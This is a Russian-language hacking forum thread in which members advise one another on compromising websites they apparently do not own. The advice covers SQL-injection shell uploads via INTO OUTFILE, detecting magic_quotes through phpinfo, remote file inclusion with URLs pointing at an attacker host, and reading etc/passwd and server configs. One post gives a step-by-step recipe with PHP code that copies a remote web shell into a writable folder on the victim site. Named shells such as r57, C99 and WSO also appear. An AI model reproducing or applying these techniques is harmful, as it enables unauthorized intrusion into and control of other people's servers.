Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    bafoed, Довольно не часто эти права имеются. Так же нужно найти пути сайта если они есть.
     
  2. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    Redwood, Бывают скули когда magic_quotes включен, а шелл залить реально ;)!
     
  3. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Для залития шелла через into outfile, тебе обязательно нужны привилегии File, magic_quotes = off (в некоторых случаях можно залиться и при magic_quotes = on), абсолютный путь до папки доступной на запись.
     
  4. iget

    iget New Member

    Joined:
    29 Mar 2009
    Messages:
    22
    Likes Received:
    1
    Reputations:
    0
    Как узнать включены ли magic_qoutes и allow_url_include еще было бы круто опен_бейсдир например узнавать? может есть тулза\скрипт, который выдавал бы эту нужную информацию?
     
  5. k2b1~

    k2b1~ Banned

    Joined:
    17 Jun 2010
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    iget , phpinfo() smotri..
    /phpinfo
    /phpinfo.php
    /info.php
     
  6. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    Обычно на сервере не хранят такую информацию (phpinfo()), например в файлах указанных нижу. Но если админ нуб, это реально. При открытии phpinfo() увидишь, то что тебе нужно. Magic_quotes включен/выключен можно узнать прямо в скуле. Достаточно узнать колонки любой таблицы, например "where+table_name='users'" и, если тебе вывелись колонки users, то magic_quotes выключен.
     
    1 person likes this.
  7. against

    against New Member

    Joined:
    3 Jun 2010
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте!Я уже писал ранее:
    Подскажите, пожалуйста!Cитуация:
    Имеется инклудовый сайт, захожу на него шеллом так-
    site.ru/index.php?page=http://myevilsite.narod.ru/shell.php
    Открывается полноценное окно шелла.Но, как только пробую выполнить команду или скачать файл, вылетает из шелла обратно на страницу уже без шелла.
    Пробовал и r57shell 1.24 и другие, одинаково.
    Может быть сможете что-нибудь посоветовать.
    Windows NT VIA-008 5.2 build 3790
    Microsoft-IIS/6.0

    Сейчас обнаружил, что могу выполнять некоторые php сценарии, кроме создания и скачивания файлов. Подскажите, пожалуйста, возможно у кого-то есть, какие-либо идеи на сей счет. Заранее большое спасибо.
     
  8. k2b1~

    k2b1~ Banned

    Joined:
    17 Jun 2010
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    poprobuy asp shell
     
  9. against

    against New Member

    Joined:
    3 Jun 2010
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    попробовал.к сожалению asp шеллы дают тот же результат, создание и скачивание файлов не удается выполнить((((
     
  10. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    2against

    Попробуй сделать так:
    1) Ищешь на сайте папку, доступную для записи.
    2) Пишешь в http://myevilsite.narod.ru/123.php такую прелесть:
    Code:
    <?php copy("http://myevilsite.narod.ru/shell.php", "папка/доступная/на/запись/321.php"); ?>
    3) site.ru/index.php?page=http://myevilsite.narod.ru/123.php
    4) site.ru/папка/доступная/на/запись/321.php

    Тут должен находиться полноценный шелл.
     
  11. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    kamaz, Если не ошибаюсь narod.ru не поддерживает язык php.
     
  12. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    На народе ничего не будет выполняться.
    RFI заключается в том, что удаленный скрипт выполняется на сервере.
    Следовательно сервер, на котором находится сайт site.ru считает с народа файл 123.php и выполнит его, скопировав файл shell.php в папку, доступную для записи.
     
  13. against

    against New Member

    Joined:
    3 Jun 2010
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Вы не могли бы, пожалуйста, подсказать скрипт какой-нибудь на поиск директории без зепрета на запись на пхп.
     
  14. against

    against New Member

    Joined:
    3 Jun 2010
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    я пробовал заходить через браузер папки, везде естественно -пермишн денайд!((
     
  15. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,519
    Likes Received:
    401
    Reputations:
    196
    так через шелл заинклюженный посмотри. Или мозгами пораскинь, где могут быть папки, доступные для записи: в /images/, /uploads/, /files/ и т.п. Если сайт с возможностью публикации контента, файлов и картинок, то пути в html-коде сайта глянуть можно. А почему у тебя не работает шелл приинклюденный (site.com/script.php?page=http://site2/shell.php). С99, да и wso нормально в таком режиме работают.
     
  16. against

    against New Member

    Joined:
    3 Jun 2010
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Попугай, затруднение в том, что сайт совсем статичный, в шелле не показывает не одной папки доступной на запись, все инклуды извне не получаются, как и скачивание, вероятно как-то режутся фаером. По-ходу на этом сайте ниче путного не прокатит, только если MySQL ковырять((((((
    Всем большое спасибо за помощь, и советы)))
     
  17. roddik

    roddik Member

    Joined:
    14 Jan 2009
    Messages:
    117
    Likes Received:
    13
    Reputations:
    0
    Привет. Есть серв на win64, mysql5 и iis 7. File_priv есть, прочел odbc.ini. Где находятся конфиги виртуальных хостов в иисе? Можно ли как-то узнать full path к сайту через конфиги? Спасибо
     
  18. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274

    /etc/httpd/conf/httpd.conf
     
  19. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    Посмотри так же тут: etc/passwd мб найдёшь что-нибудь...
     
  20. k2b1~

    k2b1~ Banned

    Joined:
    17 Jun 2010
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    odbc.ini ? mssql ?
     
Thread Status:
Not open for further replies.